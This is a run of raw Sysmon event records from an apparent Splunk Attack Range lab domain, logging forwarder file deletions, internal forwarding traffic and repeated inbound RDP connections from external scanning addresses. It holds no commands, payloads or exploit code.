14:54:24.737{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D58BECCFC62E9A62EB828B814FA44B,SHA256=EF6BEC17081B37148069586DAE97177AAD44FB85A08AFB13428637FBF224AFC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:23.143{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-34765-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049505Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:24.916{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=691A98A8D53E6396F676A9A74884A77C,SHA256=0AE5664910CFBC2228E63555C3EBE4386A866FBCE68BD25BF79AF9ACC84E9269,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049504Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:22.017{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51604-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049503Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:21.974{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65025-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049502Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:21.806{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52484-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049501Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:24.166{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=455AD454003F50327E34B932FF9A10EA,SHA256=ADABE78AFF2960C3CF38CDFC707AFF42A60F90B870EB68F3746D6107F73DBE1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:25.987{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C903AF1D12B90DFFDDE5DD51144ACC29,SHA256=970F700D5959D94397AB317961D995D7C425995FC56A92D0EEBED4036B3086BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:25.752{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF78B2ECDC5C43F6E17D051B9C0D51D,SHA256=61811B376A0732E30BF2E31150107123B4F2C9DD2CD4BAF526B42D511F05A33A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:25.377{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5903BCE3337820BBA4B35BC26F1917BB,SHA256=94A837316DAE9DA1A36E7033A48121F503AF78B1CB763BC7A75379BC080DDAEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049509Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:25.968{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9719C4DC78870E4459B81806E7FB0DE,SHA256=FA3A0598F5ED30BE417043B53D5891E623B3B3D4952A0EEFA493D078F496E685,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049508Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:23.275{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52485-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x800000000000000049507Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:22.663{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54968-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049506Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:25.229{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=483B193F3AB880863C9FF4724E157D7C,SHA256=431432F334FA43A6282721833D50F3D4032284B62A069C179FC1DC1C320A9B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:26.768{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDD7270F500D1A15A5B856B52956B9E3,SHA256=25BF2692FF0C5D0C11048359117DFD85F429142C19E29FA234673EF3D6861159,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:24.956{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54018-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:24.674{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36130-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:24.673{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30670-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:24.533{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-38860-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049510Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:26.968{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=025CD1C3B16A3CD3DE6C4E601BDFBCA4,SHA256=A1D4977C5B5851E39DD9F42D4BAE275FF598DE3ABBEE36FFC060CBB108BA2600,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:27.799{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF3D1029FB612C37B5809D819243633B,SHA256=ED9DDC69BB5AF856085A233E004CAD9A6419B4B07466319E5BF1AC6568CEB78C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:28.815{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=346F00658F0FFD464816B64E04B0CEAF,SHA256=1AA54F588BE9E999DFA91B95C4AACFAE20FECDFD6FFF3F2A4F4C74D3907B2123,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:27.414{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-41590-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:27.276{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57489-false10.0.1.12-8000- 354300x800000000000000064857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:26.865{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58447-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049514Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:26.826{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52486-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049513Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:26.821{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56046-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049512Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:26.613{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53090-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049511Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:27.999{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D485FDAAE61575522F203068F1D2D67,SHA256=CE4162ADBB6F5060FFFA34D03DD60B6844C2712D9CB3B530C423A2BFC87C0F65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:29.830{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=870A92897E19B7F1B266BE43BC264F1D,SHA256=B5A46D6DC963C37C6F52B96A85AE454DF2B971D6BF4499461DB9D66A88727FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:29.127{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D040D08D992320488A8236039883DBB2,SHA256=074FDD8354D2AFE7A05A07266FE7A2E35EE34BB89CC5E8314998462AFD1CBE9F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049518Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:28.204{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54572-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049517Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:27.793{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56079-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049516Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:29.280{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1B72A19AB462CC7BC3401AD5C76C3C8,SHA256=D5D7BF82D388EFC11996085BEEC72BFE4A357BD40113CA97836BC526E5C24EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049515Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:29.015{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E88BB003E8F963A609BE3C6F9C8E1D,SHA256=1336B32CFC0E768C89D31B24806C0792F3F1B8A29F841C6DDB4438ABA785B5E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:30.846{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D55A31C4FF9A5CB0178C766164A46E,SHA256=B3E758465CD1800432F4C5D1EE61B3A8EFF584C2AF25A8D0C13A183830C11BC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:29.001{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-42955-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:28.661{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56896-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:30.362{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25E6F2C60FA561B0CDF1968C04998867,SHA256=B6693321FAC030A04B4D9AF58FD84E5F9CC9E9F0586E430B9C7A41A438F0AF02,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049520Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:28.398{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57525-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049519Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:30.030{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F899F851C5DAC3F0EB8443140528C791,SHA256=6B613CFA9DBBB2B346641E35A2069FF391553A9EFB8437BDBB52BA15B0DFA365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:31.877{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC3135979DA8AEE52367E26B09DC6DF8,SHA256=9E0F47C690614EDDE91D212C47FBF4FCE72EC7721299DB19FE5764A880194B2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049523Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:30.008{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59013-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049522Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:31.608{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E02F62C202CE5D154392B17D800231B7,SHA256=92AFBC02229E83D49C820E9A7DB1AE7D52C1E52C6ED3853F308C5ABE8BD10C5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049521Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:31.046{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8897CC430AFE0603A65B933CE7437F0,SHA256=DDD588ECF0960A6FE787F303D38F7C0FDF5F0977F4C52B091277896EF5BF913C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:32.877{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7E953BFA1E1613460818A6A867F9A0,SHA256=EF9186FC7D64D3011E1AED034EA5524BDA248A6A59372E39F7D1FF3362CD56EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049526Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:31.251{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52487-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x800000000000000049525Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:32.655{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=178F0BBEAB621FA208F24AC39D03256C,SHA256=C9A10D9BBA98E6D20071C4F2CE1EEAA903F5D7DDA63E4DBB9F45DBF4C862E09B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049524Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:32.077{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CDD5880CC47AEFC1BB5E1FCD98593D5,SHA256=3938EE3B3E7E0F1B8CD89D50BE293562325CB9A4222B852B475AF3C532892D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:33.893{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F421150B446F8278B6B6439F7EA40D,SHA256=EF601914EC587B333653D5820621E4E27B7C4A7E68562BFECE2E9E2A580A86CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:32.292{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57490-false10.0.1.12-8000- 354300x800000000000000064871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:32.105{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-45685-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:32.104{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37495-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:31.696{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52487-false10.0.1.14win-dc-339.attackrange.local49676- 354300x800000000000000049529Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:31.874{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52488-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049528Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:31.509{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50439-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049527Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:33.093{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E3FAFFAFF628DFEABCDB9337EED8FF4,SHA256=51957AF5DEC74FCFBA38B0E5BE3AB67C9576056DA4C1E1B23C8EB7A39C75A928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:34.924{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A90926D2A92AECD7C7C2B65B49EC3B8,SHA256=D6D3D1B6AEFAA77B10A0ECECD4A329401B8FCE4580860E8639807902954C23E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:34.815{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84EA0174EE00D4151ABB591611998FCE,SHA256=50A812D1802B53A00C9438BC3EA005C9CD62BDA8CD04A911D399634DFD45A06A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:34.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\C2R64.dll2021-04-20 14:54:34.690 11241100x800000000000000064874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:34.690{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AppvIsvSubsystems64.dll2021-04-20 14:54:34.690 354300x800000000000000049531Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:33.153{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61973-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049530Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:34.108{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program 